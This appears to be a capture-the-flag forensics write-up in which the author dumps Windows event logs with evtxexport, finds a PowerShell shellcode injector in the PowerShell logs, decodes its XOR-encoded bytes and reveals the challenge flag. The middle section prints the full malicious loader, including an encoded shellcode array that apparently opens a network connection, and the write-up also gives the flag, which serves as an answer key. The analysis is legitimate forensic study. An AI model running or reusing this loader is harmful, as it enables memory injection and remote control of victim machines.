Planet Longhir is known for it's top-tier researchers. Due to their dedication in science and engineering, their military equipment is the most advanced one in the galaxy. In fact, the prototype DES-3000, a self-propelled precision-strike missile that is capable of reaching targets even in Ratnik galaxy, is being used to disable Galactic Federation's communication satellites. The mystery that Miyuki is trying to solve is, how the satellite's location was leaked since it is a top-sercret that only Galactic Federation's council is aware of. Help her analyse the Council's HQ event logs and solve this mystery.
This chall existed as a ton of EVTX files to hunt through for clues on how info was leaked.
Ended up using a utility called evtxexport to read these files and dump the output quickly and parse for clues.
apt install libevtx-utils -yRan evtxexport --help to get a list of the commands:
evtxexport 20181227
Missing source file.
Use evtxexport to export items stored in a Windows XML Event Viewer
Log (EVTX) file.
Usage: evtxexport [ -c codepage ] [ -f format ] [ -l log_file ]
[ -m mode ] [ -p resource_files_path ]
[ -r registy_files_path ] [ -s system_file ]
[ -S software_file ] [ -t event_log_type ]
[ -hTvV ] source
source: the source file
-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-949, windows-950,
windows-1250, windows-1251, windows-1252 (default),
windows-1253, windows-1254, windows-1255, windows-1256
windows-1257 or windows-1258
-f: output format, options: xml, text (default)
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, items (default), recovered
'all' exports the (allocated) items and recovered items,
'items' exports the (allocated) items and 'recovered' exports
the recovered items
-p: search PATH for the resource files
-r: name of the directory containing the SOFTWARE and SYSTEM
(Windows) Registry file
-s: filename of the SYSTEM (Windows) Registry file.
This option overrides the path provided by -r
-S: filename of the SOFTWARE (Windows) Registry file.
This option overrides the path provided by -r
-t: event log type, options: application, security, system
if not specified the event log type is determined based
on the filename.
-T: use event template definitions to parse the event record data
-v: verbose output to stderr
-V: print versionEnded up dumping all event logs to disk into parsable txt files quickly with grep:
ls *.evtx | while read ln ; do echo -------- $ln --------------------------- ; evtxexport $ln >$ln.txt ; doneDid a bit of grep looking for a few things, with cat *.txt | grep $searchterm -A30 -B45 to output lots of code Before and After, basically around my search items. Needed to look more closely though as I am seeing a lot.
Started going thru them manually w/ less until I found some interesting stuff in the Powershell logs.
@15:40:31 : powershell process injector found:
Looks like some malicious stuff here:
Microsoft-Windows-PowerShell%4Operational.evtx.txt-String: 3 : $OleSPrlmhB = @"
Microsoft-Windows-PowerShell%4Operational.evtx.txt-[DllImport("kernel32.dll")]
Microsoft-Windows-PowerShell%4Operational.evtx.txt-public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
Microsoft-Windows-PowerShell%4Operational.evtx.txt-[DllImport("kernel32.dll")]
Microsoft-Windows-PowerShell%4Operational.evtx.txt-public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
Microsoft-Windows-PowerShell%4Operational.evtx.txt-"@
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name "Win32" -namespace Win32Functions -passthru;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-[array]::Reverse($stage2);
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-$stage3 = $stage1 + $stage2;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-# Unpack Shellcode;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)
Microsoft-Windows-PowerShell%4Operational.evtx.txt-{
Microsoft-Windows-PowerShell%4Operational.evtx.txt- $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-}
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-#Unpack Special Orders!
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-for($i=0;$i -lt $stage3.count;$i++){
Microsoft-Windows-PowerShell%4Operational.evtx.txt- $stage3[$i] = $stage3[$i] -bxor 0xd1;
Microsoft-Windows-PowerShell%4Operational.evtx.txt-}
Microsoft-Windows-PowerShell%4Operational.evtx.txt-
Microsoft-Windows-PowerShell%4Operational.evtx.txt-$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);Had to figure out how to decode. Not too hard honestly.. Finally got it, commented out the baddies and outputted some things, had to play with the format a little but I use powershell a lot so this wasn't bad for me.
[..]
#[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);
# Unpack Shellcode
for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)
{
$HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;
}
#Unpack Special Orders!
for($i=0;$i -lt $stage3.count;$i++){
$stage3[$i] = $stage3[$i] -bxor 0xd1;
}
write-output "`r`n`r`n"
write-output "stage3:"
foreach ($c in $stage3) {
$chr=[char][int]$c
write-host -NoNewLine $chr
}
write-output "`r`n`r`n"
write-output "HVOASfFuNSxRXR:"
foreach ($c in $HVOASfFuNSxRXR) {
$chr=[char][int]$c
write-host -NoNewLine $chr
}
#$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);Cool! Ran it and:
stage3:
HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}
HVOASfFuNSxRXR:
AÁâíRHR AQB<HÐfxR`HRQVHR H·JJM1ÉHrPH1À¬<a|, AÁÉ
rH
¬AÁ8àuñLLE9ÑuØXD@$IÐfAHÖH1ÀAÁÉ
HD@IÐAAXAX^YHÐZAXAYAZHì ARÿàXAYZHéKÿÿÿ]I¾ws2_32AVI æHì I åI¼9À¨ATI äL ñAºLw&ÿÕL êhYAº)kÿÕj
A^PPM1ÉM1ÀHÿÀH ÂHÿÀH ÁAºêßàÿÕH ÇjAXL âH ùAº¥taÿÕ
Àt
IÿÎuåèHìH âM1ÉjAXH ùAºÙÈ_ÿÕø~UHÄ ^ öj@AYhAXH òH1ÉAºX¤SåÿÕH ÃI ÇM1ÉI ðH ÚH ùAºÙÈ_ÿÕø}(XAWYh@AXjZAº
/0ÿÕWYAºunMaÿÕIÿÎé<ÿÿÿHÃH)ÆH
öu´AÿçXjYIÇÂðµ¢VÿÕ
This one was not bad, maybe an hour or so? Fun and rewarding to find.